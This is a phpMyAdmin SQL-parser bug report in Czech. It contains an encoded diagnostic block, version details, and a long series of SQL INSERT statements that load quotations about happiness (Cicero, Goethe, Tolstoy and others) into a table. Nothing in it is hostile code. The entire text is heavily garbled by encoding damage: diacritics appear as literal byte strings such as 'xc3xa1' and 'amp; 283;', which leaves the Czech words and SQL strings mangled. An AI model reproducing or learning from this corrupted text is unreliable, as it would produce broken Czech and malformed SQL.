Pokud stxc3xa1le mxc3xa1te problxc3xa9my nebo pokud SQL parser ohlxc3xa1sxc3xad chybu u dotazu, kterxc3xbd na p amp; 345;xc3xadkazovxc3xa9 amp; 345;xc3xa1dce funguje, prosxc3xadm pokuste se zredukovat dotaz na co nejmenxc2x9axc3xad, ve kterxc3xa9m se problxc3xa9m jexc2x9at amp; 283; vyskytne, a ohlaxc2x9ate chybu na strxc3xa1nkxc3xa1ch phpMyAdmina spolu se sekcxc3xad Vxc3x9dPIS uvedenou nxc3xadxc2x9ee ZA amp; 268;xc3x81TEK Vxc3x9dPISU eNqVWk1v5MYRvetXdAAjToDRWBqtPlY BLtredf2fijS2gF8c g ZK aw2U2zm7SH yg QTAw5 yN OUUDDC85BJIRAXlVJEez9jqhD Z6SC6ruurVq1dFn11cvLk4F c 2xbOJeHn2 lTsH0zwz4E4OTo 2Ll8i5vXOzvPvrk8FR99EZ8K 73JZeFVMTZ6Os6TfFSJyXgiJn t7B5 s738yORKTyenh5HRyIAo5 Lb04 zEXH 28ml 9eWpOBhPDsaHJ7vGXe18fXkh3lyOxJPn Z6 fjsQ3Z7D1N23FF2fiaLy3c 7q ySlefTg 3M3N s75i3N6ZPQGnjwaH4yPxeeFUk8vP9t5 eT1 81MR V3t3e7JyeHj3ckOG vi9eXZ xVv88faN C5zZVzI78Q3T15 fXYp rT 6GQkPn6tZtU6XDfiO qx9aMRMjUQazxfCqpnPFP64 kn6 YJux Ecp7dVu9LH4 M f7vyfVz 9atHeHfiFiK7Wyi8OHZ m VhXBrouclfbpcUzC9V7YmXqrIrg gcUPVU nwa6FLYNdjREmY7TMxKUs3FxaMcCnw71tn0Ihr1a xbtrX1 gZdBALXTk4JE3vxVi8ULaY i1iJV86GRBVG2jDE2v6WtUxkbmHvs 6lGc4mgsuCEx731xz0 mfLBaBz xrhqnXKYRGp0jEMvmiCk 8GKmfXDBlaLMGziM18TrmRaVMCrHmaZl7MrIOh G4rmWkcu ceKkc4BrrIS5P3nMZKVGZT7e8Rp6q OndZY1NJR4jdtFgJn5YhnY FMx2pwg2xc Cena23z3BOny8D bIfVSEROzLzKhCd8xE0lDUyKuohk bCQCYlVWemWE1yI3uiIw0QOhWt4q GNkGWsnLnNVKKBlEE Ye ZZr1Twp4FimjXZ2LN46sorsrEQ2 96ZhRCbKZOLVfxI xNLhBy3liGALAElWg OKYCxUc9SDDByW 3FVyUeKBus8C4JEXy4pq40s4AwA4 BbgO8eToNz3B XwKuPncGXVDwCKnsqYYA1eVeE1xMIDkbI iZ4w aqdqaW3P6Gd6Sj8zkg2i7amm1 COCCihhERg3fGokpQRDYTsUugJAYFa bstp66g iGx0FV4gX5 dUgZDIjrsF hDkfpFXsDH7g1S6V 2UKnImrgOAiCeVGPxWsFdJpVoma4mkuLOoBPyEyUVA1whz LPb9UsBiafK19KA4w Ld9Jo60bBMqW TDveXCxjVP5MTg0g4mJAIVOFtDeusk1aAgcdfeIWR1a2FAa v5h6ZQfYO2qJErTYIREdIajiXkzn BHqr8tulEVVD1LwAGlOHQ860XSWOUBMbVy7ApXi059CnRm rE8Fz6CDU8wIP93oPEFSC2CNw4p4hu BOGk tbeqJS4o fly58Ws2niMNqC6y6vTHC41P3k6C CC9m CIK3ckE5rLO1JVcrgFz9CPgpG2l6 pQee8CfYBajLHc6T3iG24KX1taI VQm7zhaMDAVusJSaOjUy W1KrfFKEpCzEZZS4XNlElqoYcuxJ f wumnV 5920JESnYnofOsw1Iw4AdQWq0rgokxVX5Pj3leT RQW P wcZTIvltSlnTdS0yfThVsVp 2RqcPXTFV7K4wqF0UEiu8l7bq AsinWI2Ue92byQ1aoH7FTV 4qlLgFcdpPHpClXTeCCwGfLOw 6d HQ0SDOD7FC5VqBegVW10CJ2FQJsKOuSttkswElWnUdaibzg hDePjnqTTGl4VS9c8HpKVsdedCg0 MaTQCSA0FCoDRytpd5 KPBDmdrlAxUt07CKWuhhk bi3 h5I Ykfs0DniizjSI1EDqiS8wBx29eBk NY SZd2CtQSMnhfy3RDDrWokbHC6oJbACyDw8kZbbTqI3m etiiImQDHe48h 75xi6Rck0ooMuazF kixUEK90iNBDzUAYtbTYU4IUU9R9Z6HTUO5GX 9EbRJkWF2r KIHsQ3LTUZuN2khws0tQyeAot1Ag dfrLBpm 7ilydCyXb6VfoIEGgaIK3MRNQgdOSM9i0gEhWgqG tSaj1serOWsyZYiW cm2rOgOzdt lFO5iIkvOr6mwxTao nJIXx 3NLOYitw1TxeCuqpGzCNYN5wB wDPqTyQEKljFikWDdORQmcRbcbi W1kguucqDDPPLKQjarGtHK6WnrQdiR4GVdiAShMZp2VMPd Wq2KXLhQokjYSXGSL9eaFVXGgE56mL lUVtxUPE vGj3gUkBwTexzkwSTBWwEVGX9slrpUJi08ZZ sC F9BLcAHdjvhTkobR4fcW1fHhxgGi RbYlMmlWTPBQP wjIW3rCsnwvWdZ2uZrLM5BemvQtyupA WX0uL5JHR0C1SYTFAEaVKVMSm8p0fYA TvSPiOI4y1Y0WXWlhLO1V7c4E4QlM0UF739AgQ450VF3oh oRSxyrVjh 22yxMGeYmJJTCXFrVhQ4 VoHKrIbI6GOmQU2KjUcF0JqOAVQruXm5Djl0aMCUHaF gysS 17ae JZUdFLYEirGV8CYiGUx38YS 2jjGTbTwIQ6dbBzqJmjZ6teH3t1f2IzWLXUDQTxKUCf6HBTx T6eZMjDqXDjwxTvMdrI08RAnHm85 0c0KgYeFh3C0WaHKpTFiWWlv7qkEK7ueXTc4Nek6UlGgmrG 4VBjF5QDTJ3tbpr26xnhWQ04h1izi eHKCQYwVpFzUO81yuZs1V5smOhZnV862ORgGuJP9jeFOpK pZX0mM 7Nf4BenyovicuC5nnGJYhx CdhQ4d409ndqjxPizzfC6tRlHaqR9tuGei8BfL5piiMUI7EXuFJlw J3s6t0lt1OFqfINwKvLIbg IdJ8E982KdEVDoHKr5Uh3WPuqtS1kn0FZqycWSIA1yn97IP7 sox 0Ffi6b8LO6QPnRA viG1FlNv NEtPCwAeupac201N30 LBQ8 vCZA32ppHRHHVbQtJBgNJEq Q87qNEPcyDEIoOkdKDQik3YggNqjD 1ttBDeVVCXa1mLWnU2WGMPvJ4Zbnq4clF08BuUGTyEQUe FgQNE6BGDEKoFBosHtioWm1Q n5DDgd Yu7oQ Y6RFA4AhsOKonn3Z4tUzXguszIfqsUMUKWvGoJMu FYz0kjBYT8rSogBkCpX0lMfxiJhrh0 CGXoI5vGqSyEoWM fTc7YEfiv50PcKwZiln5C4urWiulp2Ep OlkjMxsZWSAHyf 2w knJsEcMDN qjXwJSTEtyTTfvbhfoiVxx 0gnmooaxmS P4ULsge zNZEV9 aHMbXPTAvbsXCmcFAT9LZFCynBaQ U0PY9 Helg 3xCToZpRinpljh9JYJkuRqu2BAYMAD9SYrenpdN OOWR9rJc6mVhW7Zx6dwE4lBktE bYgz xtnyp6Gevxj2m07QF iU BLFLrWwFoHvAt3pXiQLUM9 xNzkw ZgqtMqHTNlJREB4wmcEFvF Z9eJixtKA7Q5rqMLlEWT63iQFnhMnHhu7HaZM1VRJV8pA2K9 1BgRhjHsY K8czACbTtRnSkLqYV6 UIczD6qYutmIcitZFFbzUFTS8AaW2EPjXEDQpdQ27J79WOa rYj7E9iHbppKk3Dw07X41WNJi F o E3TmtAztuuNhbzZD6 slczeXkbgYCTc1vDdEG06Ui10hno F C53ngNwQv47YLx43OvpCr60x95ei rNYxOD9T7zWEuqCEItMYiEjVE2pbBb1oAkM7gunzwoFGhjh wzA60Sxh6LUvIWqaGt2KIlTZlrbc3 MhJcefDEqzJsJy N4 htrN3rhhk 4Rtt4vXjNUUiatcY pB5w UWWthzGqprCEfbbYihACAtSf0q XEKbsy5S1pLS5ltuGku BYlKi7aM9EsdoQ7pxfSTdhrzdhChjy X4xUXbfa7gwclNXVzyXLLpl Iz lRpZyIiKq5V4TPWXuUP530PjIS7hTkDaQ emdGFAGIhhz7cX N9SrWvpekJKjxRjs0Vzc0KK2Xb71 RJ zoPLwPOO19Z4WZ2e5TqnZDKjQyd7eLz1hNUXyuiKBLwN i3rB9umBk4qbzUI66J3i5TXqJHOKH aFrv77adrnsGFcQSgYU6rzs3o0u34Fh2KwUUAcYz0syQg gv nrTee2fGM1zZa6WcdBvuofXjGhCU ERA6vUbM6KYFM0un4Dpa kqSDe0zcBmUAFyK4GfUFGmlho Ru 5ehe2jE3SjGSMnYhTKiNQ GMr3A TJrCrvu4uEJ8yo2 U9OJNQD3IyQe1RZKqv2XveJr1sa5S7O MQJUrXyFlZ9p LljEaaqGlKEHeDx hEQjpCG0yZ0BdYlXzmMWfaUsRgPvXWKHnHjCJ3ad2nuPTT d7TRbkPap56sfpaD5BO1T0H6e0C6Yw QSK1AoUScatRdJdaYXBYDnHloHOFeJRayDzQl5WOBXChcH WZOR5FPW2QyeGMRxX76880W1FtPXoL eXEtnqSVhj 3YohDj1qHbqiAJG8Fsz4kfyFyDo4qVbFGXOJWk BnRv2oLbpfHxgKempLJv9 kAwBV t3QQ8dJEyN0T8LKzrv2iwl9vOoP0Dv7aucKrSVJSpfDHrVuaF ot5wO s8WHNfAfJNKIaLxfK0FTl 8zWTMskaDBZxKk bHRztBHQoSkhJoCZPRIWx8iuZv3sHLeU Vf9IdEiLuyLcN2hnOatxCG3Jus3nj j3CE0yKOWO0EJ8prgxoNGnN1pMNpv1vb2nv0Askvu3Upyrn Z6p 9Cq7i95fdCqP7OvB7P RN9qh7 X7Dc5y0ed80lRTNHyc9I7N5V69v2kxcZxHGCmtFqqPsUX1d NWNf8Udwg0F8p2ooM2pZO9o43xnX7 1cTU9P3FRUjPqDu4oj1yd402epI rtFzkOdw1tOalQUZGPBcl qb9xqvMEPvUvS9cTMDazDys4LY uYY1994ZtWdag BU1j7d6lY8n2GMQ4nG ka1qw3qm G6 R8 ceOlDS0z85c1Ck7CXSGvFC7iNaQPk Wtd6iNOP2WmwAUBCbYO VoAdFHLC fVh7fxfv7EifA== KONEC Vxc3x9dPISU ZA amp; 268;xc3x81TEK Vxc3x9dPISU ERROR C1 C2 LEN 132 133 8673 STR xc2x9a CVS Id sqlparser.lib.php,v 2.2 2003 11 26 22 52 23 rabus Exp MySQL 3.23.58 log USR OS, AGENT, VER Win IE 6.0 PMA 2.5.5 pl1 PHP VER,OS 4.3.7 FreeBSD LANG cs iso 8859 2 SQL INSERT INTO `moudra` VALUES 148, Nejv amp; 283;txc2x9axc3xad xc2x9at amp; 283;stxc3xad je, kdyxc2x9e nejsme nexc2x9a amp; 357;astnxc3xad.
amp; 268;uang c ); INSERT INTO `moudra` VALUES 149, Nejv amp; 283;txc2x9axc3xad xc2x9at amp; 283;stxc3xad, jehoxc2x9e m amp; 367;xc2x9eeme dosxc3xa1hnout, je poznxc3xa1nxc3xad, xc2x9ee xc2x9at amp; 283;stxc3xad nakonec nenxc3xad nezbytn amp; 283; nutnxc3xa9.
William Saroyan ); INSERT INTO `moudra` VALUES 150, Nejv amp; 283;txc2x9axc3xad tragxc3xa9dixc3xad nenxc3xad ztratit xc2x9eivot, ale xc2x9at amp; 283;stxc3xad.
Henry de Montherlant ); INSERT INTO `moudra` VALUES 151, Nejv amp; 283;txc2x9axc3xadm moxc2x9enxc3xbdm xc2x9at amp; 283;stxc3xadm na tomto sv amp; 283;t amp; 283; je, jestlixc2x9ee amp; 269;lov amp; 283;k m amp; 367;xc2x9ee klidn amp; 283; xc2x9exc3xadt a s jistotou upxc3xadrat nad amp; 283;ji v lepxc2x9axc3xad budoucnost.
Giacomo Leopardi ); INSERT INTO `moudra` VALUES 152, Nejv amp; 283;txc2x9axc3xadm pozemskxc3xbdm xc2x9at amp; 283;stxc3xadm je vzpomxc3xadnka na dobrxc3xa9 skutky.
Cicero ); INSERT INTO `moudra` VALUES 153, Nejv amp; 283;txc2x9axc3xadm xc2x9at amp; 283;stxc3xadm je jxc3xadt spxc3xa1t potxc3xa9, co jsem se podxc3xadval do zrcadla a nemusel si plivnout do tvxc3xa1 amp; 345;e. Claudio Sperelli ); INSERT INTO `moudra` VALUES 154, Nejv amp; 283;txc2x9axc3xadm xc2x9at amp; 283;stxc3xadm je vyhrxc3xa1t milion.
To si lidxc3xa9 myslxc3xad.
Wilhelm Mxc3xbchs ); INSERT INTO `moudra` VALUES 155, Nejv amp; 283;txc2x9axc3xadm xc2x9at amp; 283;stxc3xadm pro amp; 269;lov amp; 283;ka je to, xc2x9ee m amp; 367;xc2x9ee vykonat, co povaxc2x9euje za dobrxc3xa9 a sprxc3xa1vnxc3xa9.
J. W. Goethe ); INSERT INTO `moudra` VALUES 156, Nejv amp; 283;txc2x9axc3xadm xc2x9at amp; 283;stxc3xadm pro lidskou spole amp; 269;nost je mxc3xadr.
Lev N. Tolstoj ); INSERT INTO `moudra` VALUES 157, Nejv amp; 283;txc2x9axc3xadm xc2x9at amp; 283;stxc3xadm v xc2x9eivot amp; 283; je jistota, xc2x9ee jsme milovxc3xa1ni takovxc3xad, jacxc3xad jsme, ba naopak nehled amp; 283; na to, jacxc3xad jsme!
Victor Hugo ); INSERT INTO `moudra` VALUES 158, N amp; 283;kdy se stane, xc2x9ee se na okamxc2x9eik cxc3xadtxc3xadme xc2x9a amp; 357;astni.
Nepodlxc3xa9hejme panice za chvxc3xadli to p amp; 345;ejde.
Gesualdo Bufalino ); INSERT INTO `moudra` VALUES 159, Nem amp; 367;xc2x9eeme xc2x9exc3xa1dat jablka od pomeran amp; 269;ovnxc3xadku a xc2x9at amp; 283;stxc3xad od xc2x9eivota.
Henrik Ibsen ); INSERT INTO `moudra` VALUES 160, Nenxc3xad amp; 269;lov amp; 283;ka, kterxc3xbd by si nep amp; 345;xc3xa1l vxc3xadc nexc2x9e cokoli jinxc3xa9ho prodlouxc2x9eit si xc2x9at amp; 283;stxc3xad.
Blaise Pascal ); INSERT INTO `moudra` VALUES 161, Nenxc3xad horxc2x9axc3xad cesty za xc2x9at amp; 283;stxc3xadm nexc2x9e hxc3xbd amp; 345;enxc3xad ve vybranxc3xa9 spole amp; 269;nosti , nebo amp; 357; txc3xadm se jen snaxc2x9exc3xadme zm amp; 283;nit svou existenci ve sled veselxc3xad, poxc2x9eitk amp; 367; a pot amp; 283;xc2x9aenxc3xad, v n amp; 283;mxc2x9e se nevyhneme zklamxc3xa1nxc3xad.
Arthur Schopenhauer ); INSERT INTO `moudra` VALUES 162, Nenxc3xad jinxc3xa9ho zp amp; 367;sobu, jak bxc3xbdt xc2x9a amp; 357;astnxc3xad, nexc2x9e xc2x9exc3xadt pro druhxc3xa9.
Lev.
N. Tolstoj ); INSERT INTO `moudra` VALUES 163, Nenxc3xad lepxc2x9axc3xadho zkrxc3xa1xc2x9alujxc3xadcxc3xadho prost amp; 345;edku, nexc2x9e je xc2x9at amp; 283;stxc3xad.
Marguerite Blessingtonovxc3xa1 ); INSERT INTO `moudra` VALUES 164, Nenxc3xad pravxc3xa9 xc2x9at amp; 283;stxc3xad bez Boha.
italskxc3xa9 p amp; 345;xc3xadslovxc3xad ); INSERT INTO `moudra` VALUES 165, Nenxc3xad sprxc3xa1vnxc3xa9 spot amp; 345;ebovxc3xa1vat vxc3xadce xc2x9at amp; 283;stxc3xad, nexc2x9e kolik ho p amp; 345;inxc3xa1xc2x9axc3xadme.
Glenn Close ); INSERT INTO `moudra` VALUES 166, Nenxc3xad v amp; 283;txc2x9axc3xadho xc2x9at amp; 283;stxc3xad nexc2x9e bxc3xbdt milovxc3xa1n Bohem jako bratrem.
Jean Baptiste Henri Lacordaire ); INSERT INTO `moudra` VALUES 167, Nenxc3xad zp amp; 367;sobu, jak dodat xc2x9at amp; 283;stxc3xad srdci, z n amp; 283;hoxc2x9e xc2x9exc3xa1dnxc3xa9 xc2x9at amp; 283;stxc3xad nevychxc3xa1zxc3xad.
Arturo Graf ); INSERT INTO `moudra` VALUES 168, Nepros Boha, aby t amp; 283; u amp; 269;inil xc2x9a amp; 357;astnxc3xbdm, ale uxc2x9eite amp; 269;nxc3xbdm.
xc2x8at amp; 283;stxc3xad se dostavxc3xad potom.
Margaret Mitchellovxc3xa1 ); INSERT INTO `moudra` VALUES 169, Nexc2x9at amp; 283;stxc3xadm a bolestxc3xad se amp; 269;lov amp; 283;k o amp; 269;ixc2x9a amp; 357;uje od vxc2x9aech trosek, jako zlato ohn amp; 283;m. Boxc2x9eena N amp; 283;mcovxc3xa1 ); INSERT INTO `moudra` VALUES 170, Netouxc2x9eit po xc2x9at amp; 283;stxc3xad nenxc3xad v naxc2x9axc3xad moci.
Nicolas de Malebranche ); INSERT INTO `moudra` VALUES 171, Nezajxc3xadmxc3xa1 m amp; 283; xc2x9at amp; 283;stxc3xad vxc2x9aech lidxc3xad, ale kaxc2x9edxc3xa9ho amp; 269;lov amp; 283;ka.
Boris Vian ); INSERT INTO `moudra` VALUES 172, Nexc2x9e se amp; 269;lov amp; 283;k vydxc3xa1 hledat xc2x9at amp; 283;stxc3xad, m amp; 283;l by se zeptat, zda je n amp; 283;kdo neztratil.
Zarko Petan ); INSERT INTO `moudra` VALUES 173, Nic na sv amp; 283;t amp; 283; vxc3xa1s nem amp; 367;xc2x9ee u amp; 269;init xc2x9a amp; 357;astnxc3xbdmi, pokud to nedokxc3xa1xc2x9eete vy sami.
Friedrich Bodenstedt ); INSERT INTO `moudra` VALUES 174, Nic nebrxc3xa1nxc3xad xc2x9at amp; 283;stxc3xad tolik jako p amp; 345;xc3xadlixc2x9anxc3xa1 touha a nadm amp; 283;rnxc3xa1 snaha si ho zajistit.
Arturo Graf ); INSERT INTO `moudra` VALUES 175, Nic nenxc3xad p amp; 345;xc3xadlixc2x9a malxc3xa9 pro tak malxc3xa9ho tvora, jakxc3xbdm je amp; 269;lov amp; 283;k. Prxc3xa1v amp; 283; zkoumxc3xa1nxc3xadm mali amp; 269;kostxc3xad dosahujeme velkxc3xa9ho um amp; 283;nxc3xad mxc3xadt co nejmxc3xa9n amp; 283; nexc2x9at amp; 283;stxc3xad a co nejvxc3xadce xc2x9at amp; 283;stxc3xad.
James Boswell ); INSERT INTO `moudra` VALUES 176, Nic z toho, co tvo amp; 345;xc3xad xc2x9at amp; 283;stxc3xad, nem amp; 367;xc2x9ee bxc3xbdt nedokonalxc3xa9.
Aristotelxc3xa9s ); INSERT INTO `moudra` VALUES 177, Nikdy jsem nevid amp; 283;l naprosto xc2x9a amp; 357;astnxc3xa9ho n amp; 283;koho, koho bohovxc3xa9 xc2x9at amp; 283;d amp; 345;e zahrnuli svxc3xbdmi dary.
Friedrich Schiller ); INSERT INTO `moudra` VALUES 178, Nikdy nejsme ani tak xc2x9a amp; 357;astnxc3xad, ani tak nexc2x9a amp; 357;astnxc3xad, jak si myslxc3xadme.
Franxc3xa7ois de la Rochefoucauld ); INSERT INTO `moudra` VALUES 179, Nikdy nepovaxc2x9eujte za xc2x9a amp; 357;astnxc3xa9ho toho, kdo je zxc3xa1vislxc3xbd na vn amp; 283;jxc2x9axc3xadch okolnostech.
Seneca ); INSERT INTO `moudra` VALUES 180, Nikdy nesexc2x9ael ze svxc3xa9 cesty.
To je skoro definice pozemskxc3xa9ho xc2x9at amp; 283;stxc3xad.
Egon Friedell ); INSERT INTO `moudra` VALUES 181, Nikdy si nep amp; 345;ej p amp; 345;xc3xadlixc2x9a velkxc3xa9 xc2x9at amp; 283;stxc3xad!
Nebesa by ti je mohla ud amp; 283;lit.
amp; 269;xc3xadnskxc3xa9 p amp; 345;xc3xadslovxc3xad ); INSERT INTO `moudra` VALUES 182, O nikom nem amp; 367;xc2x9eeme amp; 345;xc3xadci, xc2x9ee byl xc2x9a amp; 357;astnxc3xbd, dokud nezem amp; 345;e a nenxc3xad poh amp; 345;ben.
Ovidius ); INSERT INTO `moudra` VALUES 183, Od amp; 345;xc3xadkxc3xa1nxc3xad je kouzelnxc3xa9 sl amp; 367;vko, kterxc3xa9 vyvolxc3xa1 vexc2x9akerxc3xa9 xc2x9at amp; 283;stxc3xad.
Ludwig Bxc3xb6rne ); INSERT INTO `moudra` VALUES 184, Opravdovxc3xa1 lxc3xa1ska nehledxc3xa1 svxc3xa9 xc2x9at amp; 283;stxc3xad, nxc3xbdbrxc2x9e zapomxc3xadnajxc3xadc na sebe vxc2x9aeho se chce z amp; 345;xc3xadci, vxc2x9aechno darovat a v tom nalxc3xa9zt svxc3xa9 xc2x9at amp; 283;stxc3xad.
Augustin Wibbelt ); INSERT INTO `moudra` VALUES 185, Opravdovxc3xa9 xc2x9at amp; 283;stxc3xad je jen plodem ctnosti a odm amp; 283;nou za ni.
Antonio Rosmini ); INSERT INTO `moudra` VALUES 186, Opravdovxc3xa9 xc2x9at amp; 283;stxc3xad m amp; 367;xc2x9eeme najxc3xadt jen tehdy, kdyxc2x9e mezi nxc3xa1mi a Bohem panuje vztah lxc3xa1sky.
Matka Tereza z Kalkaty ); INSERT INTO `moudra` VALUES 187, Opravdovxc3xa9 xc2x9at amp; 283;stxc3xad spo amp; 269;xc3xadvxc3xa1 v radosti hledanxc3xa9 v tob amp; 283;, Pane jen v txc3xa9to, a xc2x9exc3xa1dnxc3xa9 jinxc3xa9.
sv.
Augustin ); INSERT INTO `moudra` VALUES 188, Opravdovxc3xa9 xc2x9at amp; 283;stxc3xad spo amp; 269;xc3xadvxc3xa1 v tom, co darujeme.
sv.
Jan Zlatoxc3xbastxc3xbd ); INSERT INTO `moudra` VALUES 189, Opravdovxc3xa9 xc2x9at amp; 283;stxc3xad stojxc3xad za mxc3xa1lo je li drahxc3xa9, nestojxc3xad za nic.
Franxc3xa7ois Renxc3xa9 de Chateaubriand ); INSERT INTO `moudra` VALUES 190, Opravdovxc3xbd p amp; 345;xc3xadtel nxc3xa1m vxc3xadc dopomxc3xa1hxc3xa1 ke xc2x9at amp; 283;stxc3xad nexc2x9e tisxc3xadc nep amp; 345;xc3xa1tel k nexc2x9at amp; 283;stxc3xad.
Marie Ebner Eschenbachovxc3xa1 ); INSERT INTO `moudra` VALUES 191, Opravdu xc2x9a amp; 357;astnxc3xbd je jen ten, kdo na sebe bere rizika lxc3xa1sky.
Roger Schutz ); INSERT INTO `moudra` VALUES 192, Opravdu xc2x9a amp; 357;astnxc3xbd je ten amp; 269;lov amp; 283;k, kterxc3xa9mu se xc2x9exc3xa1dnxc3xa9ho dne nep amp; 345;ihodxc3xad nic zlxc3xa9ho.
Eurxc3xadpidxc3xa9s ); INSERT INTO `moudra` VALUES 193, Plnxc3xa9 xc2x9at amp; 283;stxc3xad je lxc3xa1ska.
Angelus Silesius ); INSERT INTO `moudra` VALUES 194, Podmxc3xadnkami k dosaxc2x9eenxc3xad xc2x9at amp; 283;stxc3xad jsou boj, nxc3xa1maha a vytrvalost.
Antoine de Saint Exupxc3xa9ry ); INSERT INTO `moudra` VALUES 195, Pohled na xc2x9a amp; 357;astnxc3xa9ho amp; 269;lov amp; 283;ka uklid amp; 328;uje.
Skute amp; 269;nost, xc2x9ee jsme jej xc2x9a amp; 357;astnxc3xbdm u amp; 269;inili my, oblaxc2x9euje.
Theodor G. Hippel ); INSERT INTO `moudra` VALUES 196, Pokaxc2x9edxc3xa9, kdyxc2x9e si znovu uv amp; 283;domxc3xadme svxc3xa9 xc2x9at amp; 283;stxc3xad, zrodxc3xad se v nxc3xa1s novxc3xa1 touha xc2x9exc3xadt.
Marcel Proust ); INSERT INTO `moudra` VALUES 197, Pot amp; 283;xc2x9aenxc3xad se m amp; 367;xc2x9ee zaklxc3xa1dat na iluzi, ale xc2x9at amp; 283;stxc3xad vyr amp; 367;stxc3xa1 z pravdy.
Nicolas de Chamfort ); INSERT INTO `moudra` VALUES 198, Povaxc2x9eujeme za nepopiratelnou pravdu, xc2x9ee vxc2x9aichni lidxc3xa9 byli stvo amp; 345;eni rovnocennxc3xad a byli obda amp; 345;eni n amp; 283;kterxc3xbdmi nezcizitelnxc3xbdmi prxc3xa1vy jako je prxc3xa1vo na xc2x9eivot, na svobodu a na xc2x9at amp; 283;stxc3xad.
Deklarace nezxc3xa1vislosti Spojenxc3xbdch stxc3xa1t amp; 367; americkxc3xbdch ); INSERT INTO `moudra` VALUES 199, Pravxc3xa9 xc2x9at amp; 283;stxc3xad je v tom, xc2x9ee po n amp; 283;m netouxc2x9exc3xadme, nebo amp; 357; spo amp; 269;xc3xadvxc3xa1 prxc3xa1v amp; 283; v tom, xc2x9ee jsme svobodnxc3xad.
Epiktxc3xa9tos ); INSERT INTO `moudra` VALUES 200, Pravxc3xa9 xc2x9at amp; 283;stxc3xad nenxc3xad ani v bohatstvxc3xad nebo v blahobytu, ani v lidskxc3xa9 slxc3xa1v amp; 283; nebo moci, ani v xc2x9exc3xa1dnxc3xa9 lidskxc3xa9 amp; 269;innosti, jakkoli m amp; 367;xc2x9ee bxc3xbdt uxc2x9eite amp; 269;nxc3xa1, jako v amp; 283;da, technika, um amp; 283;nxc3xad, ani v xc2x9exc3xa1dnxc3xa9m tvoru, nxc3xbdbrxc2x9e pouze v Bohu, prameni vexc2x9akerxc3xa9ho dobra a vexc2x9akerxc3xa9 lxc3xa1sky.
Katechismus katolickxc3xa9 cxc3xadrkve ); INSERT INTO `moudra` VALUES 201, Pravxc3xa9 xc2x9at amp; 283;stxc3xad spo amp; 269;xc3xadvxc3xa1 v dokonalosti mxc3xa9ho ducha, totixc2x9e v umxc3xadrn amp; 283;nosti, spravedlnosti, svobod amp; 283;, lxc3xa1sce, laskavosti, poznxc3xa1nxc3xad Boha, podporovxc3xa1nxc3xad jeho xc3xbamysl amp; 367; a odevzdanosti do jeho svatxc3xa9 v amp; 367;le.
Moses Mendelssohn ); INSERT INTO `moudra` VALUES 202, Pro ctnostnxc3xa9ho amp; 269;lov amp; 283;ka je xc2x9at amp; 283;stxc3xad a nexc2x9at amp; 283;stxc3xad jako pravice a levice poxc2x9exc3xadvxc3xa1 ob amp; 283;.
sv.
Kate amp; 345;ina Sienskxc3xa1 ); INSERT INTO `moudra` VALUES 203, Pro kaxc2x9edou bytost obda amp; 345;enou rozumovxc3xbdmi schopnostmi je nejv amp; 283;txc2x9axc3xadm xc2x9at amp; 283;stxc3xadm poznxc3xa1nxc3xad Boha.
sv.
Tomxc3xa1xc2x9a Akvinskxc3xbd ); INSERT INTO `moudra` VALUES 204, Pro amp; 269; nenachxc3xa1zxc3xadme xc2x9at amp; 283;stxc3xad?
Protoxc2x9ee je hledxc3xa1me tam, kde nenxc3xad na vrcholu svxc3xa9 existence, ve velkxc3xa9 dxc3xa1lce.
Ale ono se naopak nachxc3xa1zxc3xad na klidnxc3xa9m, stinnxc3xa9m a dob amp; 345;e skrytxc3xa9m mxc3xadst amp; 283;, na nexc2x9e, bohuxc2x9eel, dosp amp; 283;jeme jen z amp; 345;xc3xaddka v naxc2x9aem nitru.
Joseph von Kapff Essenther ); INSERT INTO `moudra` VALUES 205, P amp; 345;xc3xadroda vloxc2x9eila do kaxc2x9edxc3xa9ho dobrxc3xa9ho srdce tento uxc2x9alechtilxc3xbd cit amp; 269;lov amp; 283;k nem amp; 367;xc2x9ee bxc3xbdt xc2x9a amp; 357;astnxc3xbd sxc3xa1m, ale musxc3xad svxc3xa9 xc2x9at amp; 283;stxc3xad hledat v dobru n amp; 283;koho jinxc3xa9ho.
J. W. Goethe ); INSERT INTO `moudra` VALUES 206, Radost se zaklxc3xa1dxc3xa1 na pokojnxc3xa9 d amp; 367;v amp; 283; amp; 345;e, xc2x9ee dobro stejn amp; 283; nakonec zvxc3xadt amp; 283;zxc3xad.
Helen Kellerovxc3xa1 ); INSERT INTO `moudra` VALUES 207, Radosti se nelze zmocnit, musxc3xad se t amp; 283; zmocnit sama.
Nelze jxc3xad klxc3xa1st podmxc3xadnky.
Paul Claudel ); INSERT INTO `moudra` VALUES 208, Rodinnxc3xa9 radosti jsou pro amp; 269;lov amp; 283;ka t amp; 283;mi nejcenn amp; 283;jxc2x9axc3xadmi a radost, kterou majxc3xad rodi amp; 269;e ze svxc3xbdch d amp; 283;txc3xad, je nejsv amp; 283;t amp; 283;jxc2x9axc3xad na sv amp; 283;t amp; 283;.
Johann H. Pestalozzi ); INSERT INTO `moudra` VALUES 209, Rozumnxc3xbd tvor p amp; 345;irozen amp; 283; touxc2x9exc3xad po xc2x9at amp; 283;stxc3xad KONEC Vxc3x9dPISU SQL dotaz INSERT INTO `moudra` VALUES 148, Nejv amp; 283;txc2x9axc3xad xc2x9at amp; 283;stxc3xad je, kdyxc2x9e nejsme nexc2x9a amp; 357;astnxc3xad.
amp; 268;uang c ); INSERT INTO `moudra` VALUES 149, Nejv amp; 283;txc2x9axc3xad xc2x9at amp; 283;stxc3xad, jehoxc2x9e m amp; 367;xc2x9eeme dosxc3xa1hnout, je poznxc3xa1nxc3xad, xc2x9ee xc2x9at amp; 283;stxc3xad nakonec nenxc3xad nezbytn amp; 283; nutnxc3xa9.
William Saroyan ); INSERT INTO `moudra` VALUES 150, Nejv amp; 283;txc2x9axc3xad tragxc3xa9dixc3xad nenxc3xad ztratit xc2x9eivot, ale xc2x9at amp; 283;stxc3xad.
Henry de Montherlant ); INSERT INTO `moudra` VALUES 151, Nejv amp; 283;txc2x9axc3xadm moxc2x9enxc3xbdm xc2x9at amp; 283;stxc3xadm na tomto sv amp; 283;t amp; 283; je, jestlixc2x9ee amp; 269;lov amp; 283;k m amp; 367;xc2x9ee klidn amp; 283; xc2x9exc3xadt a s jistotou upxc3xadrat nad amp; 283;ji v lepxc2x9axc3xad budoucnost.
Giacomo Leopardi ); INSERT INTO `moudra` VALUES 152, Nejv amp; 283;txc2x9axc3xadm pozemskxc3xbdm xc2x9at amp; 283;stxc3xadm je vzpomxc3xadnka na dobrxc3xa9 skutky.
